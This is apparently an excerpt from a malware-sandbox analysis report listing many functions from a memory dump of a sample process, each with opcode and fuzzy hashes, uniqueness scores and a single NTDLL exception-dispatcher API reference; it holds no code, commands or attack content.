API String ID: 6842923-0
Opcode ID: c747ad277f640c3c6dcb2aabb30ce6d8a25bfc0b78387efbbe3ca76eec428399
Instruction ID: 68c5eecfbecc59c69ce07a8f5a54021cdbd1766e05b7d27b237a45229c54c642
Opcode Fuzzy Hash: c747ad277f640c3c6dcb2aabb30ce6d8a25bfc0b78387efbbe3ca76eec428399
Instruction Fuzzy Hash: 7CC1BF74E10218CFDB64DFA5C990B9DBBB2BF89304F2081AAD509AB355DB359A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00261A58 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00261B23

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6a31e97a79af54bd6a686db0618212904b02558e78a14f72a211f9972b07f457
Instruction ID: d7b3430bdfe0b62bf05479b5bde6c27d084bfe79c77b49ffce9625fce7a4ea14
Opcode Fuzzy Hash: 6a31e97a79af54bd6a686db0618212904b02558e78a14f72a211f9972b07f457
Instruction Fuzzy Hash: FFC1AE74E10218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002604A0 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026056B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 49fa91f971eee3a6c5b38c6dad162a63b1aec7563e4d2b9929d1fce292f403d5
Instruction ID: f0be2aacadac16b727214d690aec89a634269b0ff2ee2990f68e2b2233516070
Opcode Fuzzy Hash: 49fa91f971eee3a6c5b38c6dad162a63b1aec7563e4d2b9929d1fce292f403d5
Instruction Fuzzy Hash: 70C1C074E00218CFDB54DFA5C994B9EBBB2BF89304F2081AAD409AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002686A0 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026876B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fe4044370aa77089af55f81111e402e21830660b4d05d52d2dff2bdbf8d16f11
Instruction ID: 0d836d1e6ad136a808ada2e70232263b94c0c0576abe6354113c83670c28edf2
Opcode Fuzzy Hash: fe4044370aa77089af55f81111e402e21830660b4d05d52d2dff2bdbf8d16f11
Instruction Fuzzy Hash: 90C1CF74E00218CFDB54DFA5C990B9DBBB2BF89304F2081AAD809AB354DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002611A8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00261273

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 027a3d1dad1c361f98ea1fbd30dab986d75b7f23332a38009ca7050e675d6ef1
Instruction ID: 63909b6c1fdece4084b13d4029c59bc69bf21d3bf9b4d99557552b836f370051
Opcode Fuzzy Hash: 027a3d1dad1c361f98ea1fbd30dab986d75b7f23332a38009ca7050e675d6ef1
Instruction Fuzzy Hash: BBC1AE74E10218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00261EB0 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00261F7B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e996acdef437963ac4c18e1e1ab49b3347e66bf8c33bf45db9c67b4eef4dfc2a
Instruction ID: 1492111933ea9274783fa57b0e44f6950ae3cc042096a96abad90fbf97ecacf1
Opcode Fuzzy Hash: e996acdef437963ac4c18e1e1ab49b3347e66bf8c33bf45db9c67b4eef4dfc2a
Instruction Fuzzy Hash: 89C1BE74E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00262BB8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00262C83

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a29825cb1c3b6053a2219620df5ae049d04baa1107b957ae714c54d1fc05eac9
Instruction ID: 31b35c2d88fb92cdd6c3758f52ea311380650492652c861d6d55df13f0ec0c86
Opcode Fuzzy Hash: a29825cb1c3b6053a2219620df5ae049d04baa1107b957ae714c54d1fc05eac9
Instruction Fuzzy Hash: 60C1A074E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00269C80 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00269D4B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b0da73ed0832a22cb3986446c55075a0adcd7307cf5bd6c8a703198f3c829f31
Instruction ID: d6cdf6c935faa412e604085fc072ebd06038f1b3176baf125745f2ae00ff84cf
Opcode Fuzzy Hash: b0da73ed0832a22cb3986446c55075a0adcd7307cf5bd6c8a703198f3c829f31
Instruction Fuzzy Hash: 11C1BF74E00218CFDB54DFA5C994BADBBB6BF89304F2081AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0026A988 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026AA53

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d86876b27253457be07d7052004284493ca49ad2451cd6140c8990ae6a790028
Instruction ID: c8d3d7f2c70eab7f5768021390b57c156ff09949810273076b35d00333482825
Opcode Fuzzy Hash: d86876b27253457be07d7052004284493ca49ad2451cd6140c8990ae6a790028
Instruction Fuzzy Hash: 67C1AE74E10218CFDB64DFA5C990B9DBBB2BF89304F2081AAD409AB355DB359E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00267998 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00267A63

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6ae6df4372c2f4ee4461bdd0d3ee39ac28cfbfd8963b7fc057a987edfd82cb76
Instruction ID: aa252088f5bda67ff0c817f5be90568a41aab224da1a04a13e3c1760a1e203ef
Opcode Fuzzy Hash: 6ae6df4372c2f4ee4461bdd0d3ee39ac28cfbfd8963b7fc057a987edfd82cb76
Instruction Fuzzy Hash: 9DC1BE74E00218CFDB54DFA5D990BADBBB2BF89304F2081AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002670E8 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002671B3

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7fad7f5e914dbc3bcdc2a0751431f57fd93aa95fd161a8e64001bc5064f749aa
Instruction ID: 87271d7f3decd347e354a17036481e49ac3914f890412e286c10feccff11de5c
Opcode Fuzzy Hash: 7fad7f5e914dbc3bcdc2a0751431f57fd93aa95fd161a8e64001bc5064f749aa
Instruction Fuzzy Hash: 15C1B074E00218CFDB54DFA5D994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00267DF0 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00267EBB

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e9a32a07b5eae0fdeeab23dde2322a5eb60d059d2eaa81335560390bd223ac12
Instruction ID: 984561872f236cfa3b55dd6c6c34db544d29aaabd74cf95f51042390cf87888a
Opcode Fuzzy Hash: e9a32a07b5eae0fdeeab23dde2322a5eb60d059d2eaa81335560390bd223ac12
Instruction Fuzzy Hash: C7C1BE74E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002608F8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002609C3

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a33b7c28fa80c5f98fef9cfb56b896cbf43fda5a77924275ea617a8e7d758583
Instruction ID: 8284fc4cdff80d3ee35e5355d5516de2cd45b8dab048591065b450beace6c51f
Opcode Fuzzy Hash: a33b7c28fa80c5f98fef9cfb56b896cbf43fda5a77924275ea617a8e7d758583
Instruction Fuzzy Hash: B9C1BF74E10218CFDB54DFA5C990B9EBBB2BF89304F2081AAD509AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002693D0 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026949B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 29c39fa4cab65542c4c77a5b541fc98c213904ca54f61146ccb3e2e5eb483e97
Instruction ID: a4e40863e89f63ab1932ac9a59b3de50f2d20200b3baecb4be340628805d2977
Opcode Fuzzy Hash: 29c39fa4cab65542c4c77a5b541fc98c213904ca54f61146ccb3e2e5eb483e97
Instruction Fuzzy Hash: A1C1CF74E10218CFDB54DFA5C990B9DBBB6BF89304F2081AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0026A0D8 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026A1A3

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5b95b424c65e001029d8a1019b4d6ac2bdeec055862ad98e2d2bef47c96992fa
Instruction ID: 84f2ea0d2e4f39874a5d9ab64cd5c0b31c1ff53414a5c8747e3e92501901e369
Opcode Fuzzy Hash: 5b95b424c65e001029d8a1019b4d6ac2bdeec055862ad98e2d2bef47c96992fa
Instruction Fuzzy Hash: 42C1BE74E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD409AB355DB359E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00268B10 Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00268BEC

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3f16e960a9446d8bb5c6096749d4d8ecbd45f782c90dbae662fb08a8c4f253e7
Instruction ID: 694546b22ab407c892b7b733aa460b016d6db548c7d15a03d051229e082e58c5
Opcode Fuzzy Hash: 3f16e960a9446d8bb5c6096749d4d8ecbd45f782c90dbae662fb08a8c4f253e7
Instruction Fuzzy Hash: 9441F5B0E012488FDB18DFE6D8946DEFBB6BF89304F24C16AD414AB259DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00267530 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026760B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4fb6a2482ae95aebf4d6faddf6e95edc3ae59ddde928014f60d9014981793180
Instruction ID: 1ec5b157dade0fc7dc1bf91c3fca7ee92afc9126f0528e1e92162ed44256f994
Opcode Fuzzy Hash: 4fb6a2482ae95aebf4d6faddf6e95edc3ae59ddde928014f60d9014981793180
Instruction Fuzzy Hash: A441F5B0E052488BDB18DFEAD8446DEBBF6BF89304F24C12AD414AB359DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00268239 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00268313

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4d74f0aaede6331666313dbb372008875e483b2f184155dc24f86001d90c1c8f
Instruction ID: 0e26be8a5287809aa2bf15f1d7c8fa6c4caeb39b8665e4cfa81a73070aba0349
Opcode Fuzzy Hash: 4d74f0aaede6331666313dbb372008875e483b2f184155dc24f86001d90c1c8f
Instruction Fuzzy Hash: 4D41E2B0E012088BDB18DFAAC8546DEBBF6AF99304F24D16AD418BB259DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00268F6D Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00269043

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e7003eee4842e0ae3b88e225729a3a078def0c1a3dc02b612ef05f4bdd5dc8bd
Instruction ID: 3a69564c5da6e43eccc2bd451c6404873cd23e5706657a320fab9be609ec1fc3
Opcode Fuzzy Hash: e7003eee4842e0ae3b88e225729a3a078def0c1a3dc02b612ef05f4bdd5dc8bd
Instruction Fuzzy Hash: D741F3B0E002088FDB18DFA6D9446DEBBF6AF89304F24D16AD418AB355DB355945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00266C57 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00266D33

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ca7b43c4a07403a542852c99dfc2e2e499803d5aed93b3371acf7a85352b1528
Instruction ID: 3c213009ee6de0894671acfb051cb659150ecc10cf8f232e759c49bc0891772e
Opcode Fuzzy Hash: ca7b43c4a07403a542852c99dfc2e2e499803d5aed93b3371acf7a85352b1528
Instruction Fuzzy Hash: D141F3B0E052488BEB18DFAAD9546DEFBF2AF89304F24C16ED418AB255DB344946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00267988 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00267A63

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 918a066be85b0e9f0b2481fc2df7604568ee280ff8a778a0dab8c0a6e9e0c09b
Instruction ID: a7818170b015f4f6d115bd148c66115a98031a52a9635f2313db54dd805b48c7
Opcode Fuzzy Hash: 918a066be85b0e9f0b2481fc2df7604568ee280ff8a778a0dab8c0a6e9e0c09b
Instruction Fuzzy Hash: D8410570E052488BEB08DFBAD8446EEFBF2AF89304F24C12AD404AB355DB355945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002693C0 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026949B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: df60eaee142bb344ffafd1a18a7c4843ff817f9fa120b11acc253caf77c4f8a8
Instruction ID: 0c5a2197775ff5d4eb0d20f46fdf7145594f560689cb066795ff7cde6ebb17a8
Opcode Fuzzy Hash: df60eaee142bb344ffafd1a18a7c4843ff817f9fa120b11acc253caf77c4f8a8
Instruction Fuzzy Hash: 444104B4E05208CBDB08DFBAD4846DEFBB6AF89304F24C16AC414BB255DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00263000 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002630DB

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d4e2991d3e30ef5de1513004ba0d8370109903d9a26b33845309940be26f63c5
Instruction ID: 06b3b0b4d8286777061b9395d5d64f6cd2bc74f57bbe363403b2a8bc75ca1b6c
Opcode Fuzzy Hash: d4e2991d3e30ef5de1513004ba0d8370109903d9a26b33845309940be26f63c5
Instruction Fuzzy Hash: 8341F3B0E042488BDB18DFAAD8546EEFBF6BF89304F24C16AD408BB255DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00269818 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002698F3

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e3bc01cddaa32e5ec1899b1607412c75a928775dcddf0ab6abf324603e3ca3d1
Instruction ID: 056f8d4936b6949970384015b55f08468dccfb5cad247734712e2a84ca9230c0
Opcode Fuzzy Hash: e3bc01cddaa32e5ec1899b1607412c75a928775dcddf0ab6abf324603e3ca3d1
Instruction Fuzzy Hash: A64115B0E012088FDB18DFAAD8446EEFBF6AF99304F24D12AD404BB255DB344985CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0026A979 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026AA53

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 453697ae97f3907a7591266393d4fa05dcb446bb2e8e3b7249872cb0d26b2254
Instruction ID: 0e449cc69f2510b7506e2589bc398e83929e91a4182ef4e0556123694c468fe0
Opcode Fuzzy Hash: 453697ae97f3907a7591266393d4fa05dcb446bb2e8e3b7249872cb0d26b2254
Instruction Fuzzy Hash: 0641E1B0E012088BDB18DFAAC9546DEBBF2BF89304F24C12AD419BB259DB385945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00263459 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00263533

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 24ef5954799ad69876e76ccbed6282b4a2520138fd369c578ff0c77f01af6452
Instruction ID: a8023d2f960a32057fa305058dd3b97e9adc5ae19a73d1abf2c7a83c25bd1d32
Opcode Fuzzy Hash: 24ef5954799ad69876e76ccbed6282b4a2520138fd369c578ff0c77f01af6452
Instruction Fuzzy Hash: D141E1B0E05248CFDB18DFEAD8546DEFBB2AF89304F24C12AD418AB259DB385945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00262BA8 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00262C83

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 45e704ce2b67f71b172d6fde5b8644395cedc2db407c4bee40314cd09acdad85
Instruction ID: b4b8567e75e09c417ef0097a361eb9edf03e040aa33cfff7bacbe38bb7ff7b39
Opcode Fuzzy Hash: 45e704ce2b67f71b172d6fde5b8644395cedc2db407c4bee40314cd09acdad85
Instruction Fuzzy Hash: BF4104B0E04648CBDB08DFA6D5506EEFBF2AF89304F24C16AD404AB359DB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00261198 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00261273

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e1358951c1b895d7bf763d92b04d5cc0db7a8817c28aa4a49ad7363a68d501b5
Instruction ID: a7fd737df3a16abc0a236ceda62ca5fe7ff91ccc5e1fffebb6fe98c591079d67
Opcode Fuzzy Hash: e1358951c1b895d7bf763d92b04d5cc0db7a8817c28aa4a49ad7363a68d501b5
Instruction Fuzzy Hash: 774114B0E00248CBDB08DFAAD8506DEFBF2AF89304F24C12AC419AB359DB345945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002670DC Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002671B3

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 16b77535f4831515492abe3e53373559e055fc72943994f23e0d8a6e6b3ace1c
Instruction ID: b90c76aa6886efa107002b8be11f693029fd3f82c59c5c63612faf444424a387
Opcode Fuzzy Hash: 16b77535f4831515492abe3e53373559e055fc72943994f23e0d8a6e6b3ace1c
Instruction Fuzzy Hash: 7741F2B0E052488BDB18DFAAD8546DEFBF2AF89304F24C16AD418BB359DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00260D41 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00260E1B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3d28e8d70d6b252bfe70f3d592700ae042c9c49b8e856f193efd7aa437a5828b
Instruction ID: e636977be2ec6e8e9f8c3ea75258c1d0b50c4fae71badc5a7efc320a8669f560
Opcode Fuzzy Hash: 3d28e8d70d6b252bfe70f3d592700ae042c9c49b8e856f193efd7aa437a5828b
Instruction Fuzzy Hash: AE41F3B0E052088BDB18DFAAD8406DEFBF2BF89304F24C56AD408AB355DB355945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00261A48 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00261B23

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6af72bc72804923ee180f46563cdcb9a13111319962ddb028eb46794a3c2f558
Instruction ID: 62b6a9d1f26ab456f34e20cdd49b1b25c851889603ff9382f812445922014370
Opcode Fuzzy Hash: 6af72bc72804923ee180f46563cdcb9a13111319962ddb028eb46794a3c2f558
Instruction Fuzzy Hash: D241F3B0E002488BEB18DFA6D8507EEFBF2AF99304F24C12AD418AB359DB355955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00262753 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0026282B

Memory Dump Source

Source File: 00000006.00000002.1172311964.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_260000_rinzearec84736.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
